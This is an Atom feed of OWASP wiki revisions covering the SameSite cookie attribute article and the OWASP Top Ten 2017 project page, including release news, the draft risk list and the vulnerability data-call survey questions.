The &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt; value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will '''not''' receive the session cookie and the user will not be able to access the project.&lt;br /&gt;
&lt;br /&gt;
A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt; flag would be most appropriate here.&lt;br /&gt;
&lt;br /&gt;
The default &amp;lt;code&amp;gt;lax&amp;lt;/code&amp;gt; value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods (e.g. &amp;lt;code&amp;gt;POST&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
As of November 2017 the SameSite attribute is implemented in Chrome, Firefox, and Opera.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://tools.ietf.org/html/draft-west-first-party-cookies-07&lt;br /&gt;
* https://caniuse.com/#search=samesite&lt;br /&gt;
* http://www.sjoerdlangkemper.nl/2016/04/14/preventing-csrf-with-samesite-cookie-attribute/&lt;br /&gt;
* https://chloe.re/2016/04/13/goodbye-csrf-samesite-to-the-rescue/&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SameSite&amp;diff=235582</id>
		<title>SameSite</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SameSite&amp;diff=235582"/>
				<updated>2017-11-19T02:39:12Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Updated supporting browsers&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
&lt;br /&gt;
SameSite prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage, and provides some protection against cross-site request forgery attacks. Possible values for the flag are &amp;lt;code&amp;gt;lax&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt; value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will '''not''' receive the session cookie and the user will not be able to access the project.&lt;br /&gt;
&lt;br /&gt;
A bank website however most likely doesn't want to allow any transactional pages to be linked from external sites so the &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt; flag would be most appropriate here.&lt;br /&gt;
&lt;br /&gt;
The default &amp;lt;code&amp;gt;lax&amp;lt;/code&amp;gt; value provides a reasonable balance between security and usability for websites that want to maintain user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website while blocking it in CSRF-prone request methods (e.g. &amp;lt;code&amp;gt;POST&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
As of November 2017 the SameSite attribute is implemented in Chrome, Firefox, and Opera.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://tools.ietf.org/html/draft-west-first-party-cookies-07&lt;br /&gt;
* https://caniuse.com/#search=samesite&lt;br /&gt;
* http://www.sjoerdlangkemper.nl/2016/04/14/preventing-csrf-with-samesite-cookie-attribute/&lt;br /&gt;
* https://chloe.re/2016/04/13/goodbye-csrf-samesite-to-the-rescue/&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235462</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235462"/>
				<updated>2017-11-14T22:16:11Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: fix link (d'oh!)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 RC2 Released==&lt;br /&gt;
RC2 is now [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf available for download]. In an ongoing effort to be transparent, we are asking for all comments to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issues list].&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call completed==&lt;br /&gt;
&lt;br /&gt;
* A big thank you to all industry professionals who completed this [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 &amp;lt;u&amp;gt;survey for new vulnerability categories&amp;lt;/u&amp;gt;] to help determine up to two items in the 2017 Top 10. The deadline for the survey was &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
* The data call for the 2017 Top 10 had been reopened, a bit thank you to all the contributors. The  [https://goo.gl/forms/tLgyvK9O74r7wMkt2 &amp;lt;u&amp;gt;call for data&amp;lt;/u&amp;gt;] is now closed. The deadline for the extended data call was &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;18 September, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;.&lt;br /&gt;
This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html &amp;lt;u&amp;gt;OWASP blog posting&amp;lt;/u&amp;gt;] describes the process in detail.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ &amp;lt;u&amp;gt;OWASP Summit 2017&amp;lt;/u&amp;gt;], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html &amp;lt;u&amp;gt;outcomes of the OWASP Summit&amp;lt;/u&amp;gt;] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items (-&amp;gt; see OWASP Top 10 2017 - Industry survey open and data call reopened)&lt;br /&gt;
* Feedback on the mailing list has been moved to the [https://github.com/OWASP/Top10/issues &amp;lt;u&amp;gt;issues list&amp;lt;/u&amp;gt;] in GitHub, please continue to contribute feedback there. &lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_RC2_Final.pdf | OWASP Top 10 2017 RC2 - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 RC2 Published&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
